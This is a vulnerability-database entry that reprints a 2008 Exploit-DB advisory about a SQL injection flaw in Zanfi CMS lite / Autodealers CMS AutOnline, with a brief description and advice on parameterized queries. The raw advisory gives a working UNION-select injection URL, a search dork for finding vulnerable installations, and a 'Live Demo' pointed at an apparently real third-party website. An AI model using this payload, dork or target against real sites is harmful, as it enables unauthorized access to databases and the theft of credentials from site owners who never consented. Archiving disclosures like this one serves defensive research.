Zanfi CMS lite / Autodealers CMS AutOnline (SQL Injection)

vendor:

Zanfi CMS lite / Autodealers CMS AutOnline

by:

r45c4l

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Zanfi CMS lite / Autodealers CMS AutOnline

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Zanfi CMS lite / Autodealers CMS AutOnline (SQL Injection)

An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database, such as usernames and passwords, or even execute arbitrary system commands on the server.

Mitigation:

The best way to mitigate SQL injection attacks is to use parameterized queries (also known as prepared statements). This approach ensures that an attacker is not able to change the intent of a query, even if SQL commands are inserted by an attacker.

Source

Exploit-DB raw data:

################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE                #
#                   and all darkc0de members                ---# 
################################################################ 
# 
# Author: r45c4l 
# 
# Home  : www.darkc0de.com 
# 
# Email : r45c4l@hotmail.com 
# 
# Share the c0de! 
# 
################################################################ 
# 
# Title: Zanfi CMS lite / Autodealers CMS AutOnline (SQL Injection)
#
# Vendor: http://www.zanfi.nl/autodealerscms.php
# 
# Demo: http://autonline.zanfi.nl/
###########################################################
#
# d0rk:Powered by: Zanfi Solutions
#.  
# 
###########################################################
 
     Exploit:-
	http://www.site.com/[path]/index.php?page=DBpAGE&pageid=-1'+union+select+null,concat(version(),0x3a,database(),0x3a,user())/*

     
     
     Live Demo: 
	http://www.aartsvastgoed.nl/aankoopvastgoed/index.php?page=DBpAGE&pageid=-1%27+union+select+null,concat(version(),0x3a,database(),0x3a,user())/*


###########################################################
#
#  Bug discovered : 10 Sep.2008
###########################################################

# milw0rm.com [2008-09-11]